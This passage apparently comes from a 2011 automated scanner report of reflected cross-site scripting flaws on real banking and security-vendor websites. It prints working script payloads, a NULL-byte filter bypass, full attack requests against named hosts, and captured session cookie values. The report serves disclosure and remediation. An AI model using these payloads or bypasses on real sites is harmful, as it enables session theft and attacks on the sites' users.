The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0093556"><script>alert(1)</script>754868bc16e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93556"><script>alert(1)</script>754868bc16e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/zero-dollar-trades.aspx?%0093556"><script>alert(1)</script>754868bc16e=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00ed4ab'%3b713afc694b6 was submitted in the src_cd parameter. This input was echoed as ed4ab';713afc694b6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/zero-dollar-trades.aspx?src_cd=SDMST1%00ed4ab'%3b713afc694b6&cm_sp=BAI-SD-_-DDT-_-BHP-C2f-Service_gwim-024_hi2_direct-v4_arq031i4.gif HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <![CDATA[ var SPC = { 'Tactic' : 'SDMST1.ed4ab';713afc694b6' ,'Page' : 'zero-dollar-trades' ,'preview' : false }; //]]> ...[SNIP]...
2.111. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.merrilledge.com
Path:
/m/pages/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5a88"><script>alert(1)</script>68ae74c56a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a88"><script>alert(1)</script>68ae74c56a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/home.aspx?%00b5a88"><script>alert(1)</script>68ae74c56a4=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %009bb58'-alert(1)-'f918fae9796 was submitted in the d parameter. This input was echoed as 9bb58'-alert(1)-'f918fae9796 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/ScriptResource.axd?d=aMsfwGC65viXscZammbwz6zVFIwHFO4g83huxlAC0KuLGg8lFje6MewypzmXEh1Q-UpPplE2gpclxViF2RgXdWh4YVn0Q7OU4DI9NURWJHVBNMFF62hTMIOAgq_f-eSgwyY66kBWIgZWwjCsZf_0Klh7YwLof_ssMm6kcCPx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076 HTTP/1.1 Host: www.retirement.merrilledge.com Proxy-Connection: keep-alive Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:33:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 5518
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... /ira/scriptresource.axd?d=amsfwgc65vixsczammbwz6zvfiwhfo4g83huxlac0kulgg8lfje6mewypzmxeh1q-uppple2gpclxvif2rgxdwh4yvn0q7ou4di9nurwjhvbnmff62htmioagq_f-esgwyy66kbwigzwwjcszf_0klh7ywlof_ssmm6kccpx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076',"Exception has been thrown by the target of an invocation.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace") ...[SNIP]...
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003fef9'-alert(1)-'ad42e38776 was submitted in the d parameter. This input was echoed as 3fef9'-alert(1)-'ad42e38776 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916 HTTP/1.1 Host: www.retirement.merrilledge.com Proxy-Connection: keep-alive Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:33:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 3965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... <script type='text/javascript' language='javascript'>g_ml_ira_jsLib_1_0.writeErrorMessage('dbe14061-d790-4130-9806-2537a9416f20','/ira/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916',"Invalid character in a Base-64 string.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace");</script> ...[SNIP]...
2.114. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.retirement.merrilledge.com
Path:
/IRA/pages/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009627c"><script>alert(1)</script>ac0806a009c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9627c"><script>alert(1)</script>ac0806a009c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /IRA/pages/home.aspx?%009627c"><script>alert(1)</script>ac0806a009c=1 HTTP/1.1 Host: www.retirement.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="Conten ...[SNIP]... <a href="../System/SearchResults.aspx?.9627c"><script>alert(1)</script>ac0806a009c=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')"> ...[SNIP]...
2.115. https://www2.bankofamerica.com/promos/jump/greatdeals/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www2.bankofamerica.com
Path:
/promos/jump/greatdeals/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb0e"%20a%3db%20b8409311022 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bb0e" a=b b8409311022 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /promos/jump/greatdeals/?3bb0e"%20a%3db%20b8409311022=1 HTTP/1.1 Host: www2.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:30:31 GMT Content-type: text/html Set-Cookie: SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; path=/; domain=.bankofamerica.com; secure P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Abnormal Connection: close
<HTML> <HEAD> <TITLE>An Error Has Occurred</TITLE> </HEAD>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de1ac"><a>d044400ccc3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Pages/English/In_Activation.asp HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=de1ac"><a>d044400ccc3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33074 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=KCDJILIAKJFFAMJGBLOJMJFD; secure; path=/ Date: Wed, 02 Feb 2011 22:00:02 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <input type="hidden" name="hdnSourceURL" value="HTTP://WWW.GOOGLE.COM/SEARCH?HL=EN&Q=DE1AC"><A>D044400CCC3"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef54b'-alert(1)-'a8c45daa09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ef54b'-alert(1)-'a8c45daa09
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 01:04:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3685 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Def54b%27%2Dalert%281%29%2D%27a8c45daa09; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=GECPFOICPDDIKDIBPNDLBLKA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1ff9"><script>alert(1)</script>7f3eaf59b2d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /help/equalhousing_popup.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Referer: http://www.google.com/search?hl=en&q=a1ff9"><script>alert(1)</script>7f3eaf59b2d
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:25 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=131550827; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: GEOSERVER=1; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 49599--><script>alert(1)</script>3f6c8a7be9a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pages/jpmorgan HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Thu, 03-Feb-2011 22:26:48 GMT Date: Wed, 02 Feb 2011 22:19:44 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=c9JYNJYQ7WXh3nVLQdNX56kVHZr1h13x6LR3BV6XVQ8pnhVHjnMl!-1967453422; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <t ...[SNIP]... <!-- userAgentPassed:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a --> ...[SNIP]...
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de9b"><script>alert(1)</script>6af6a5ce680 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8de9b\"><script>alert(1)</script>6af6a5ce680 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arbornetworks.com Proxy-Connection: keep-alive Referer: http://www.arbornetworks.com/report Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; mbfcookie[lang]=en8de9b"><script>alert(1)</script>6af6a5ce680; PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.1.10.1296689848
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a91"><script>alert(1)</script>4a8a421a526 was submitted in the mbfcookie[lang] cookie. This input was echoed as 56a91\"><script>alert(1)</script>4a8a421a526 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cleanpipes HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en56a91"><script>alert(1)</script>4a8a421a526; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7177"><script>alert(1)</script>7651ebbe8e8 was submitted in the mbfcookie[lang] cookie. This input was echoed as a7177\"><script>alert(1)</script>7651ebbe8e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cn/865.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ena7177"><script>alert(1)</script>7651ebbe8e8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaab4"><script>alert(1)</script>d4517558dd0 was submitted in the mbfcookie[lang] cookie. This input was echoed as eaab4\"><script>alert(1)</script>d4517558dd0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cn/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=eneaab4"><script>alert(1)</script>d4517558dd0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce73"><script>alert(1)</script>78e956c9366 was submitted in the mbfcookie[lang] cookie. This input was echoed as bce73\"><script>alert(1)</script>78e956c9366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
